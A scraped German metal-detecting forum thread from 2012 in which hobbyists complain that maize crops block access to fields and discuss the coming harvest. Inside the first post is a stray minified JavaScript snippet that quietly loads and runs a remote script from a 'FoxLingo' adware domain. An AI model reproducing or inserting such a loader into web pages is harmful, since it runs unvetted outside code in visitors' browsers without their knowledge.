[x] Bitte registrieren Sie sich um alle Funktionen des Forums nutzen zu können. Als Gast können Sie z.B. keine Bilder betrachten.

Registrieren          Schliessen
Achtung!
 >  Sondengehen > Rund ums Sondengehen (Moderator: Raymond) > Thema:

nichts als Mais!

Gehe zu:  
Avatar  nichts als Mais!  (Gelesen 621 mal) 0
A A A A
*
Seiten: 1    Nach unten
(versteckt)Themen Schreiber
08. September 2012, um 20:04:38 Uhr

Da habe ich mich echt schlau gemacht und mir ein paar Äcker ausgesucht die ich begehen wollte und was finde ich!?
Mais!!! Überal Mais.  Ausrasten Bei uns hier sind alle Felder mit Mais besetzt. Ich habe nicht einen Acker gefunden der sich ohne großen Zuschauerandrang sondieren läst. Auser denen mit Mais.
Oder der Bauer hatte die Äcker  schon mit was neuem eingesäht.
Steht den der Mais so hoch im Kurs, dass alle nur noch Mais anbauen?
Kein freies Feld.
Jetzt bleibt mir Morgen nur noch der Wald.  Traurig
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

(versteckt)
08. September 2012, um 20:07:25 Uhr

leider kann man auch aus mais...... E 10 machen      Platt

(versteckt)
08. September 2012, um 20:27:57 Uhr

Aus Mais kann man auch Futter für die Rindviecher machen Schockiert
Ab in den Wald auf  Suchen

Gruß 
Martin

(versteckt)
08. September 2012, um 20:40:56 Uhr

mmh kenn das Problem...... wann wird das Zeug eigentlich geerntet?? kann doch nich mehr lange sein....

(versteckt)
08. September 2012, um 21:31:41 Uhr

Bei uns fuhren Heute die ersten Maisernter aus .. Die Stoppel werden meist am selben oder nächsten Tag noch gehäckselt  Smiley

(versteckt)
08. September 2012, um 22:03:22 Uhr

echt?   Lächelnd   Super  Super
awoll!Dann wird mein Silberacker endlich wieder begehbar, und nach dem Pflügen folgt die zweite Ernte Reiter

(versteckt)
08. September 2012, um 22:07:54 Uhr

Servus

Ich sag nur Biogas...

Bei uns sind auch Maisfelder so weit das Auge reicht.
Gut ist es, wenn man einen guten Acker mit ringsum Maisfeldern hat. Da kann man dann wirklich entspannt sondeln.

Bei uns sind etwa 20-30% der Maisfelder abgeerntet, die Stoppel machen aber nicht so recht Laune.
Dauert noch bisschen bis alles glatt ist, dann kommt Teil zwei der Ackersaison.

Grüße
Wolfgang

Seiten: 1 
Haftungsausschluss / Nutzungsbedingungen Datenschutzerklärung Impressum Kontakt Mobile Version